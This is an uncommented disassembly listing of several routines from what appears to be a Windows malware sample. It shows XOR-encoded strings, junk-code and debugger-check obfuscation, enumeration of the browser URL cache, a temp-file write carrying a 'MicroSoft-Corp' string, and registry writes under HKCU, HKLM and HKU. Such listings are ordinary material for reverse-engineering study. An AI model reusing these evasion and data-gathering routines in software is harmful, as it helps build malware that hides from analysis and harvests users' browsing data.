var_2F48 = byte ptr -2F48h
var_2F47 = byte ptr -2F47h
var_2F46 = word ptr -2F46h
var_2F43 = byte ptr -2F43h
var_1F44 = dword ptr -1F44h
var_1F40 = byte ptr -1F40h
var_1F3C = dword ptr -1F3Ch
var_1F38 = dword ptr -1F38h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2F5Ch
call sub_40C6B8
push ebx
push esi
loc_40524C: ; DATA XREF: sub_440531�r
push edi
mov [ebp+var_2F46], 7B0Ch ; DATA XREF: sub_44053D�r
; sub_440549�r
inc [ebp+var_2F46] ; DATA XREF: sub_440555�r sub_440561�r
lea edi, [ebp+var_2F52] ; DATA XREF: sub_44056D�r
lea esi, aDpVB ; DATA XREF: sub_440579�r sub_440585�r
; ">Dp+'B"
movsd
movsd
push [ebp+arg_0] ; DATA XREF: sub_440591�r
lea eax, [ebp+var_2F43] ; DATA XREF: sub_44059D�r
loc_405274: ; DATA XREF: sub_4405A9�r
push eax
call sub_40C6D8 ; DATA XREF: sub_4405B5�r
mov [ebp+var_2F47], 33h ; DATA XREF: sub_4405C1�r
; sub_4405CD�r
add [ebp+var_2F47], 1 ; DATA XREF: sub_4405D9�r
push 1
push offset byte_447387
call sub_405138 ; DATA XREF: sub_4405E5�r
mov edi, 12h
sub edi, dword_44229C ; DATA XREF: sub_4405F1�r
push edi
push eax
lea edi, [ebp+var_2F43]
push edi
loc_4052A8: ; DATA XREF: sub_4406AD�r sub_4406B9�r
call sub_40181A
add esp, 14h
loc_4052B0: ; DATA XREF: sub_4406C5�r
mov edi, eax
mov [ebp+var_2F4A], di ; DATA XREF: sub_4406D1�r
; sub_4406DD�r
movzx eax, [ebp+var_2F4A] ; DATA XREF: sub_4406E9�r
loc_4052C0: ; DATA XREF: sub_4406F5�r sub_440701�r
cmp eax, 0FFFFh
jz short loc_4052D6
movzx eax, [ebp+var_2F4A] ; DATA XREF: sub_44070D�r
; sub_440719�r
mov [ebp+eax+var_2F43], 0 ; DATA XREF: sub_440725�r
; sub_440731�r
loc_4052D6: ; CODE XREF: sub_40523D+88�j
; DATA XREF: sub_44073D�r ...
mov [ebp+var_2F48], 22h
add [ebp+var_2F48], 90h ; DATA XREF: sub_440755�r
loc_4052E4: ; DATA XREF: sub_440761�r sub_44076D�r ...
mov [ebp+var_1F44], 1F40h
call sub_40C764 ; DATA XREF: sub_440785�r
push 3 ; DATA XREF: sub_440791�r
push offset byte_447383 ; DATA XREF: sub_44079D�r
call sub_405138
add esp, 8
lea edi, [ebp+var_1F44] ; DATA XREF: sub_4407A9�r
loc_405308: ; DATA XREF: sub_4407B5�r
push edi
lea edi, [ebp+var_1F40] ; DATA XREF: sub_4407C1�r
push edi
loc_405310: ; DATA XREF: sub_4407CD�r
push eax
call sub_40BC38 ; DATA XREF: sub_4407D9�r
mov ebx, eax
loc_405318: ; DATA XREF: sub_4407E5�r
or eax, eax
jz loc_4053F9 ; DATA XREF: sub_4407F1�r
loc_405320: ; DATA XREF: sub_4407FD�r sub_440809�r
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40CBE4 ; DATA XREF: sub_440815�r
add esp, 8 ; DATA XREF: sub_440821�r
or eax, eax
jnz short loc_40536B ; DATA XREF: sub_44082D�r
mov [ebp+var_2F53], 0CEh ; DATA XREF: sub_440839�r
loc_405340: ; DATA XREF: sub_440845�r sub_440851�r
sub [ebp+var_2F53], 68h
push [ebp+var_1F38] ; DATA XREF: sub_44085D�r sub_440869�r
push [ebp+arg_4]
loc_405350: ; DATA XREF: sub_440875�r sub_440881�r
call sub_40C6D8
lea edi, [ebp+var_2F5B] ; DATA XREF: sub_44088D�r
lea esi, aB_mxkw ; "B_mxkw&"
movsd
movsd
xor eax, eax ; DATA XREF: sub_440899�r
inc eax
jmp loc_4053F9 ; DATA XREF: sub_4408A5�r
; ---------------------------------------------------------------------------
loc_40536B: ; CODE XREF: sub_40523D+FA�j
; sub_40523D:loc_4053F2�j
; DATA XREF: ...
mov [ebp+var_2F53], 1Dh
movzx eax, [ebp+var_2F53] ; DATA XREF: sub_4408C9�r
; sub_4408D5�r
imul eax, 42B9h ; DATA XREF: sub_4408E1�r
mov [ebp+var_2F53], al ; DATA XREF: sub_4408ED�r
; sub_4408F9�r
mov [ebp+var_1F44], 1F40h ; DATA XREF: sub_440905�r
; sub_440911�r
lea eax, [ebp+var_1F44] ; DATA XREF: sub_44091D�r
; sub_440929�r
push eax
lea eax, [ebp+var_1F40] ; DATA XREF: sub_440935�r
push eax
push ebx
call sub_40BC44 ; FindNextUrlCacheEntryA
or eax, eax
jz short loc_4053F7
call sub_40C854 ; IsDebuggerPresent
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40CBE4
add esp, 8
or eax, eax
jnz short loc_4053F2
mov [ebp+var_2F58], 6518h
mov eax, [ebp+var_2F58]
mov edx, eax
add edx, eax
mov [ebp+var_2F58], edx
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C6D8
xor eax, eax
inc eax
jmp short loc_4053F9
; ---------------------------------------------------------------------------
loc_4053F2: ; CODE XREF: sub_40523D+186�j
jmp loc_40536B
; ---------------------------------------------------------------------------
loc_4053F7: ; CODE XREF: sub_40523D+168�j
xor eax, eax
loc_4053F9: ; CODE XREF: sub_40523D+DD�j
; sub_40523D+129�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40523D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053FE proc near ; CODE XREF: sub_4054C8+602�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C854 ; IsDebuggerPresent
push ebx
call sub_40C95C ; lstrlenA
mov [ebp+var_8], eax
call sub_40C7C4 ; GetTickCount
mov edi, [ebp+var_8]
shl edi, 1
add edi, 8
push edi
push 40h
call sub_40C878 ; LocalAlloc
mov [ebp+var_C], eax
call sub_40C794 ; GetProcessHeap
xor esi, esi
jmp short loc_40544F
; ---------------------------------------------------------------------------
loc_405439: ; CODE XREF: sub_4053FE+54�j
movzx eax, byte ptr [ebx+esi]
xor eax, 71h
or eax, eax
jz short loc_40544E
movzx eax, byte ptr [ebx+esi]
xor eax, 71h
mov [ebx+esi], al
loc_40544E: ; CODE XREF: sub_4053FE+44�j
inc esi
loc_40544F: ; CODE XREF: sub_4053FE+39�j
cmp esi, [ebp+var_8]
jb short loc_405439
mov [ebp+var_2], 0
jmp short loc_4054B2
; ---------------------------------------------------------------------------
loc_40545C: ; CODE XREF: sub_4053FE+BB�j
push 6
push offset dword_44737C
call sub_405138
mov [ebp+var_10], eax
movzx edi, [ebp+var_2]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_14], edx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_C]
push edi
mov esi, [ebp+var_10]
push esi
push edi
call sub_40CC50
add esp, 1Ch
inc [ebp+var_2]
loc_4054B2: ; CODE XREF: sub_4053FE+5C�j
movzx eax, [ebp+var_2]
cmp eax, [ebp+var_8]
jb short loc_40545C
call sub_40C7C4 ; GetTickCount
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_4053FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4054C8 proc near ; CODE XREF: sub_4061F7+199�p
var_300A1 = byte ptr -300A1h
var_300A0 = dword ptr -300A0h
var_3009C = dword ptr -3009Ch
var_30096 = word ptr -30096h
var_30094 = dword ptr -30094h
var_3008D = byte ptr -3008Dh
var_3008C = dword ptr -3008Ch
var_30088 = dword ptr -30088h
var_30084 = dword ptr -30084h
var_30080 = dword ptr -30080h
var_3007C = dword ptr -3007Ch
var_30078 = dword ptr -30078h
var_30071 = byte ptr -30071h
var_3006E = word ptr -3006Eh
var_3006C = byte ptr -3006Ch
var_30067 = byte ptr -30067h
var_30064 = byte ptr -30064h
var_3005F = dword ptr -3005Fh
var_3005B = byte ptr -3005Bh
var_30058 = dword ptr -30058h
var_30054 = byte ptr -30054h
var_30051 = byte ptr -30051h
var_3004A = word ptr -3004Ah
var_30048 = dword ptr -30048h
var_30044 = word ptr -30044h
var_30041 = byte ptr -30041h
var_30040 = byte ptr -30040h
var_3003F = byte ptr -3003Fh
var_30035 = byte ptr -30035h
var_30034 = dword ptr -30034h
var_30030 = dword ptr -30030h
var_3002C = byte ptr -3002Ch
var_3002B = byte ptr -3002Bh
var_30021 = byte ptr -30021h
var_30020 = dword ptr -30020h
var_3001C = dword ptr -3001Ch
var_30018 = word ptr -30018h
var_30016 = word ptr -30016h
var_30014 = dword ptr -30014h
var_30010 = dword ptr -30010h
var_3000C = byte ptr -3000Ch
var_2000C = dword ptr -2000Ch
var_20008 = dword ptr -20008h
var_20003 = byte ptr -20003h
var_10004 = dword ptr -10004h
var_10000 = byte ptr -10000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 300A4h
call sub_40C6B8
push ebx
push esi
push edi
mov [ebp+var_30016], 316Dh
movzx eax, [ebp+var_30016]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_30016], ax
and [ebp+var_3001C], 0
call sub_40C740 ; GetCurrentThreadId
and [ebp+var_2000C], 0
and [ebp+var_30014], 0
lea eax, [ebp+var_10004]
push eax
push [ebp+arg_4]
call sub_401A7E
add esp, 8
mov ebx, eax
mov ax, word_4422B8
mov [ebp+var_3004A], ax
mov eax, [ebp+var_10004]
or eax, eax
jz short loc_405543
or ebx, ebx
jz short loc_405543
cmp [ebp+arg_14], eax
jb short loc_405571
loc_405543: ; CODE XREF: sub_4054C8+70�j
; sub_4054C8+74�j
mov byte ptr [ebp+var_30078+3], 6Fh
add byte ptr [ebp+var_30078+3], 1
push ebx
call sub_40C884 ; LocalFree
mov word ptr [ebp+var_30078], 52A5h
inc word ptr [ebp+var_30078]
mov [ebp+var_3001C], 1
loc_405571: ; CODE XREF: sub_4054C8+79�j
push [ebp+arg_C]
call sub_40C95C ; lstrlenA
mov [ebp+var_30078], eax
mov eax, 64h
mul [ebp+var_10004]
mov [ebp+var_3007C], eax
mov edi, [ebp+var_30078]
imul edi, [ebp+var_30078], 32h
mov esi, [ebp+var_3007C]
lea edi, [esi+edi+1000h]
push edi
push 40h
call sub_40C878 ; LocalAlloc
mov [ebp+var_20008], eax
call sub_40C734 ; GetCurrentProcessId
lea edi, [ebp+var_30051]
lea esi, aQcfdx ; "QcfdX'"
mov ecx, 7
rep movsb
lea edi, [ebp+var_30054]
lea esi, aNy ; "NY"
mov ecx, 3
rep movsb
push [ebp+arg_0]
push 104h
call sub_40C7B8 ; GetTempPathA
call sub_40C794 ; GetProcessHeap
mov eax, [ebp+arg_0]
mov [ebp+var_30080], eax
mov ecx, eax
or eax, 0FFFFFFFFh
loc_405603: ; CODE XREF: sub_4054C8+140�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405603
mov edi, eax
mov esi, 19h
sub esi, dword_44229C
push esi
mov esi, [ebp+var_30080]
add esi, edi
push esi
call sub_40172F
add esp, 8
call sub_40C7D0 ; GetVersion
push 4
push offset byte_447377
call sub_405138
add esp, 8
push eax
push [ebp+arg_0]
call sub_40CC74
add esp, 8
mov eax, dword_4422C4
mov [ebp+var_30058], eax
push 6
push offset dword_447370
call sub_405138
add esp, 8
push eax
push [ebp+var_20008]
call sub_40481B
add esp, 8
lea edi, [ebp+var_3005B]
lea esi, byte_4422C8
mov ecx, 3
rep movsb
push 6
push offset byte_447369
call sub_405138
add esp, 8
push eax
push [ebp+var_20008]
call sub_40481B
add esp, 8
mov eax, dword_4422CB
mov [ebp+var_3005F], eax
push 13h
push offset byte_447355
call sub_405138
add esp, 8
push [ebp+arg_1C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CC50
add esp, 10h
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40481B
add esp, 8
push 7
push offset word_44733E
call sub_405138
add esp, 8
push eax
push [ebp+var_20008]
call sub_40481B
add esp, 8
mov [ebp+var_30021], 51h
sub [ebp+var_30021], 7Ch
push 6
push offset byte_447337
call sub_405138
add esp, 8
push eax
push [ebp+var_20008]
call sub_40481B
add esp, 8
call sub_40C7C4 ; GetTickCount
lea edi, [ebp+var_30064]
lea esi, a70cg ; "70cg"
mov ecx, 5
rep movsb
push 5
push offset byte_447331
call sub_405138
add esp, 8
mov [ebp+var_30084], eax
call sub_40CC38
mov ecx, 3E8h
cdq
idiv ecx
push edx
mov edi, [ebp+var_30084]
push [ebp+var_30084]
lea edi, [ebp+var_3002B]
push edi
call sub_40CC50
add esp, 0Ch
call sub_40C854 ; IsDebuggerPresent
push 2Ah
push offset word_447306
call sub_405138
add esp, 8
lea edi, [ebp+var_3002B]
push edi
push [ebp+arg_8]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CC50
add esp, 10h
call sub_40C7C4 ; GetTickCount
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40481B
add esp, 8
mov [ebp+var_3002C], 0CAh
movzx eax, [ebp+var_3002C]
imul eax, 1107h
mov [ebp+var_3002C], al
push 2Dh
push offset dword_4472D8
call sub_405138
add esp, 8
mov [ebp+var_30088], eax
call sub_40CC38
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 14h
push edi
mov edi, [ebp+var_30088]
push [ebp+var_30088]
lea edi, [ebp+var_20003]
push edi
call sub_40CC50
add esp, 0Ch
call sub_40C854 ; IsDebuggerPresent
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40481B
add esp, 8
mov [ebp+var_30030], 7FDh
add [ebp+var_30030], 38E3h
cmp [ebp+var_3001C], 0
jnz loc_405B6E
call sub_40C734 ; GetCurrentProcessId
cmp [ebp+arg_18], 0
jz loc_4059C5
lea edi, [ebp+var_3008D]
lea esi, byte_4422D4
xor ecx, ecx
inc ecx
rep movsb
and [ebp+var_3008C], 0
jmp loc_4059A8
; ---------------------------------------------------------------------------
loc_405896: ; CODE XREF: sub_4054C8+4EC�j
call sub_40C854 ; IsDebuggerPresent
mov [ebp+var_10000], 0
mov ax, word_4422D5
mov [ebp+var_30096], ax
and [ebp+var_30094], 0
jmp loc_40594A
; ---------------------------------------------------------------------------
loc_4058BB: ; CODE XREF: sub_4054C8+48C�j
call sub_40C734 ; GetCurrentProcessId
mov eax, [ebp+var_3008C]
add eax, [ebp+var_30094]
cmp eax, [ebp+var_10004]
jnb loc_40595A
push 6
push offset dword_44737C
call sub_405138
mov [ebp+var_3009C], eax
mov edi, [ebp+var_3008C]
add edi, [ebp+var_30094]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_300A0], edx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_10000]
push edi
mov edi, [ebp+var_3009C]
push edi
lea edi, [ebp+var_10000]
push edi
call sub_40CC50
add esp, 1Ch
inc [ebp+var_30094]
loc_40594A: ; CODE XREF: sub_4054C8+3EE�j
cmp [ebp+var_30094], 80h
jb loc_4058BB
loc_40595A: ; CODE XREF: sub_4054C8+40A�j
push 30h
push offset byte_4472A7
call sub_405138
push [ebp+var_2000C]
push [ebp+arg_10]
lea edi, [ebp+var_10000]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CC50
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40481B
add esp, 24h
add [ebp+var_3008C], 80h
inc [ebp+var_2000C]
loc_4059A8: ; CODE XREF: sub_4054C8+3C9�j
mov eax, [ebp+var_10004]
cmp [ebp+var_3008C], eax
jb loc_405896
mov [ebp+var_30014], eax
jmp loc_405B6E
; ---------------------------------------------------------------------------
loc_4059C5: ; CODE XREF: sub_4054C8+3AB�j
call sub_40C854 ; IsDebuggerPresent
mov eax, [ebp+arg_14]
mov [ebp+var_10004], eax
jmp loc_405B4A
; ---------------------------------------------------------------------------
loc_4059D8: ; CODE XREF: sub_4054C8+6A0�j
call sub_40C734 ; GetCurrentProcessId
cmp [ebp+var_10000], 0
jz loc_405B4A
mov byte ptr [ebp+var_3008C+2], 9Fh
sub byte ptr [ebp+var_3008C+2], 36h
mov eax, [ebp+arg_14]
add eax, 0C800h
cmp [ebp+var_10004], eax
jnb loc_405B6E
lea edi, [ebp+var_3009C+3]
lea esi, byte_4422D7
mov ecx, 7
rep movsb
mov eax, [ebp+var_10004]
mov [ebp+var_30014], eax
push 3
push offset off_4472A3
call sub_405138
push [ebp+arg_C]
push eax
lea edi, [ebp+var_3000C]
push edi
call sub_40CC50
add esp, 14h
lea edi, [ebp+var_300A1]
lea esi, a9jm6N ; "'9jM6 N"
movsd
movsd
lea ecx, [ebp+var_3000C]
or eax, 0FFFFFFFFh
loc_405A61: ; CODE XREF: sub_4054C8+59E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405A61
mov edi, eax
mov word ptr [ebp+var_30094+2], di
mov word ptr [ebp+var_3008C], 45ACh
movzx eax, word ptr [ebp+var_3008C]
imul eax, 6B72h
mov word ptr [ebp+var_3008C], ax
lea eax, [ebp+var_10000]
push eax
movzx eax, word ptr [ebp+var_30094+2]
lea eax, [ebp+eax+var_3000C]
push eax
call sub_40C6D8
mov byte ptr [ebp+var_3008C+3], 0DBh
movzx eax, byte ptr [ebp+var_3008C+3]
mov edx, eax
add edx, eax
mov eax, edx
mov byte ptr [ebp+var_3008C+3], al
lea eax, [ebp+var_3000C]
push eax
call sub_4053FE
add esp, 4
mov [ebp+var_30010], eax
push 30h
push offset byte_4472A7
call sub_405138
add esp, 8
push [ebp+var_2000C]
push [ebp+arg_10]
push [ebp+var_30010]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CC50
add esp, 14h
call sub_40C740 ; GetCurrentThreadId
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40481B
add esp, 8
mov dword ptr [ebp-30090h], 472Eh
add dword ptr [ebp-30090h], 7A98h
push [ebp+var_30010]
call sub_40C884 ; LocalFree
call sub_40C794 ; GetProcessHeap
inc [ebp+var_2000C]
loc_405B4A: ; CODE XREF: sub_4054C8+50B�j
; sub_4054C8+51C�j
lea eax, [ebp+var_10000]
push eax
push [ebp+var_10004]
push ebx
call sub_401BB7
add esp, 0Ch
mov [ebp+var_10004], eax
or eax, eax
jnz loc_4059D8
loc_405B6E: ; CODE XREF: sub_4054C8+39C�j
; sub_4054C8+4F8�j ...
push 1Eh
push offset dword_447284
call sub_405138
push eax
push [ebp+var_20008]
call sub_40481B
mov [ebp+var_30034], 2A8Eh
add [ebp+var_30034], 6CB3h
push 7
push offset dword_44727C
call sub_405138
push eax
push [ebp+var_20008]
call sub_40481B
call sub_40C7D0 ; GetVersion
push 8
push offset byte_447273
call sub_405138
push eax
push [ebp+var_20008]
call sub_404529
mov [ebp+var_30035], 15h
add [ebp+var_30035], 2Fh
lea edi, [ebp+var_30067]
lea esi, aG ; ">"
mov ecx, 3
rep movsb
push 6
push offset dword_44726C
call sub_405138
mov [ebp+var_3008C], eax
call sub_40CC38
mov [ebp-30090h], eax
call sub_40CC38
mov ecx, 63h
cdq
idiv ecx
push edx
mov edi, [ebp-30090h]
mov eax, edi
mov ecx, 14h
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_3008C]
push edi
lea edi, [ebp+var_3003F]
push edi
call sub_40CC50
mov [ebp+var_30018], 0F6Ah
movzx eax, [ebp+var_30018]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_30018], ax
push 0Eh
push offset byte_44725D
call sub_405138
lea edi, [ebp+var_3003F]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CC50
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404529
mov [ebp+var_30040], 95h
add [ebp+var_30040], 1
push 15h
push offset byte_447247
call sub_405138
lea edi, [ebp+var_3002B]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CC50
lea edi, [ebp+var_3006C]
lea esi, a0A ; "0 ,a"
mov ecx, 5
rep movsb
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404529
call sub_40C740 ; GetCurrentThreadId
push 1
push offset byte_447245
call sub_405138
push eax
push [ebp+var_20008]
call sub_404529
mov ax, word_4422EE
mov [ebp+var_3006E], ax
push 16h
push offset word_44722E
call sub_405138
mov [ebp+var_30094], eax
call sub_40CC38
mov ecx, 3E8h
cdq
idiv ecx
mov edi, edx
add edi, 2710h
push edi
lea edi, [ebp+var_3003F]
push edi
mov edi, [ebp+var_30094]
push edi
lea edi, [ebp+var_20003]
push edi
call sub_40CC50
call sub_40C764 ; RtlGetLastWin32Error
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404529
mov [ebp+var_30041], 97h
add [ebp+var_30041], 3Eh
push 9
push offset dword_447224
call sub_405138
push eax
push [ebp+var_20008]
call sub_40481B
lea edi, [ebp+var_30071]
lea esi, byte_4422F0
mov ecx, 3
rep movsb
push 7
push offset dword_44721C
call sub_405138
push eax
push [ebp+var_20008]
call sub_40481B
call sub_40C740 ; GetCurrentThreadId
push 7
push offset dword_447214
call sub_405138
push eax
push [ebp+var_20008]
call sub_40CC74
call sub_40C7C4 ; GetTickCount
push [ebp+arg_0]
call sub_40341E
add esp, 0E4h
mov [ebp+var_30044], 4FFDh
inc [ebp+var_30044]
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+arg_0]
call sub_40C8CC ; CreateFileA
mov [ebp+var_30020], eax
mov [ebp+var_30048], 473Dh
add [ebp+var_30048], 10D3h
push [ebp+var_20008]
call sub_40C95C ; lstrlenA
push 0
lea edi, [ebp+var_2000C]
push edi
push eax
push [ebp+var_20008]
push [ebp+var_30020]
call sub_40C944 ; WriteFile
push [ebp+var_30020]
call sub_40C7AC ; CloseHandle
push [ebp+var_20008]
call sub_40C884 ; LocalFree
cmp [ebp+var_3001C], 0
jnz short loc_405E78
push ebx
call sub_40C884 ; LocalFree
jmp short loc_405E7D
; ---------------------------------------------------------------------------
loc_405E78: ; CODE XREF: sub_4054C8+9A6�j
or eax, 0FFFFFFFFh
jmp short loc_405E83
; ---------------------------------------------------------------------------
loc_405E7D: ; CODE XREF: sub_4054C8+9AE�j
mov eax, [ebp+var_30014]
loc_405E83: ; CODE XREF: sub_4054C8+9B3�j
pop edi
pop esi
pop ebx
leave
retn
sub_4054C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E88 proc near ; CODE XREF: sub_4061F7:loc_40632D�p
var_2124 = dword ptr -2124h
var_2120 = byte ptr -2120h
var_1121 = byte ptr -1121h
var_130 = dword ptr -130h
var_12B = byte ptr -12Bh
var_126 = byte ptr -126h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = word ptr -11Ch
var_11A = byte ptr -11Ah
var_114 = byte ptr -114h
var_10D = byte ptr -10Dh
var_10A = word ptr -10Ah
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
push ebp
mov ebp, esp
mov eax, 2124h
call sub_40C6B8
push esi
push edi
call sub_40C764 ; RtlGetLastWin32Error
lea edi, [ebp+var_10D]
lea esi, byte_4422F3
mov ecx, 3
rep movsb
lea edi, [ebp+var_114]
lea esi, aZ0y ; ",`z:0Y"
mov ecx, 7
rep movsb
and [ebp+var_108], 0
mov [ebp+var_101], 0
jmp loc_406024
; ---------------------------------------------------------------------------
loc_405ED5: ; CODE XREF: sub_405E88+1A4�j
call sub_40C740 ; GetCurrentThreadId
push 44h
push offset byte_4471CF
call sub_405138
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40CC50
call sub_40C7D0 ; GetVersion
push 4
push offset word_4471CA
call sub_405138
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_40160A
lea edi, [ebp+var_126]
lea esi, aNw ; "Nw "
mov ecx, 3
rep movsw
push 4
push offset word_4471CA
call sub_405138
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_40160A
mov [ebp+var_120], 2D0Fh
mov eax, 37FBh
mul [ebp+var_120]
mov [ebp+var_130], eax
mov [ebp+var_120], eax
push 4Dh
push offset dword_44717C
call sub_405138
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40CC50
call sub_40C794 ; GetProcessHeap
push 4
push offset word_4471CA
call sub_405138
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_40160A
lea edi, [ebp+var_12B]
lea esi, aAy ; " ay+"
mov ecx, 5
rep movsb
push 4
push offset word_4471CA
call sub_405138
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_40160A
add esp, 0A8h
call sub_40C794 ; GetProcessHeap
add [ebp+var_101], 1
loc_406024: ; CODE XREF: sub_405E88+48�j
mov al, [ebp+var_101]
cmp al, 5
jb loc_405ED5
call sub_40C7D0 ; GetVersion
cmp eax, 80000000h
jb short loc_4060A2
call sub_40C764 ; RtlGetLastWin32Error
push 4Ch
push offset byte_44712F
call sub_405138
mov [ebp+var_120], eax
push 10h
push offset aNskoyryklns_yo ; "~NSKOYrYKlNS_YOO"
call sub_405138
mov [ebp+var_124], eax
push 3
push offset word_44711A
call sub_405138
push 1
mov edi, 15h
sub edi, dword_44229C
push edi
push eax
mov edi, [ebp+var_124]
push edi
mov edi, [ebp+var_120]
push edi
push 80000003h
call sub_40160A
add esp, 30h
jmp loc_406140
; ---------------------------------------------------------------------------
loc_4060A2: ; CODE XREF: sub_405E88+1B4�j
mov ax, word_442308
mov word ptr [ebp+var_124+2], ax
mov eax, dword_44230A
mov [ebp+var_2124], eax
lea eax, [ebp+var_1121]
push eax
call sub_40506F
call sub_40C794 ; GetProcessHeap
push 59h
push offset dword_4470C0
call sub_405138
lea edi, [ebp+var_1121]
push edi
push eax
lea edi, [ebp+var_2120]
push edi
call sub_40CC50
call sub_40C7C4 ; GetTickCount
and [ebp+var_120], 0
push 0Ch
push offset byte_4470B3
call sub_405138
push 4
push 4
lea edi, [ebp+var_120]
push edi
push eax
lea edi, [ebp+var_2120]
push edi
push 80000003h
call sub_40160A
add esp, 38h
mov [ebp+var_11C], 3003h
movzx eax, [ebp+var_11C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_11C], ax
loc_406140: ; CODE XREF: sub_405E88+215�j
push 3Bh
push offset byte_447077
call sub_405138
mov [ebp+var_120], eax
push 11h
push offset aPsPioynszzpury ; "{PS^]PiOYNsZZPURY"
call sub_405138
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
mov edi, [ebp+var_120]
push edi
push 80000001h
call sub_40160A
lea edi, [ebp+var_11A]
lea esi, aQa@ ; "*Q@ "
mov ecx, 3
rep movsw
push 33h
push offset byte_447031
call sub_405138
push 1
push 0
push offset byte_447529
push offset byte_447529
push eax
push 80000001h
call sub_40160A
call sub_40C734 ; GetCurrentProcessId
push 3Bh
push offset byte_446FF5
call sub_405138
push 1
push 0
push offset byte_447529
push offset byte_447529
push eax
push 80000001h
call sub_40160A
add esp, 68h
mov [ebp+var_10A], 4809h
sub [ebp+var_10A], 555h
pop edi
pop esi
leave
retn
sub_405E88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4061F7 proc near ; CODE XREF: sub_4098A8+29D�p
; sub_4098A8+647�p ...
var_3DF = byte ptr -3DFh
var_3DC = dword ptr -3DCh
var_3D7 = byte ptr -3D7h
var_3D6 = byte ptr -3D6h
var_2D2 = byte ptr -2D2h
var_2CD = dword ptr -2CDh
var_2C9 = byte ptr -2C9h
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BB = byte ptr -2BBh
var_2B5 = byte ptr -2B5h
var_2B4 = dword ptr -2B4h
var_2AD = byte ptr -2ADh
var_2A5 = byte ptr -2A5h
var_29F = byte ptr -29Fh
var_298 = byte ptr -298h
var_295 = byte ptr -295h
var_28F = byte ptr -28Fh
var_28C = byte ptr -28Ch
var_286 = byte ptr -286h
var_281 = dword ptr -281h
var_27D = byte ptr -27Dh
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = word ptr -268h
var_266 = word ptr -266h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_250 = byte ptr -250h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
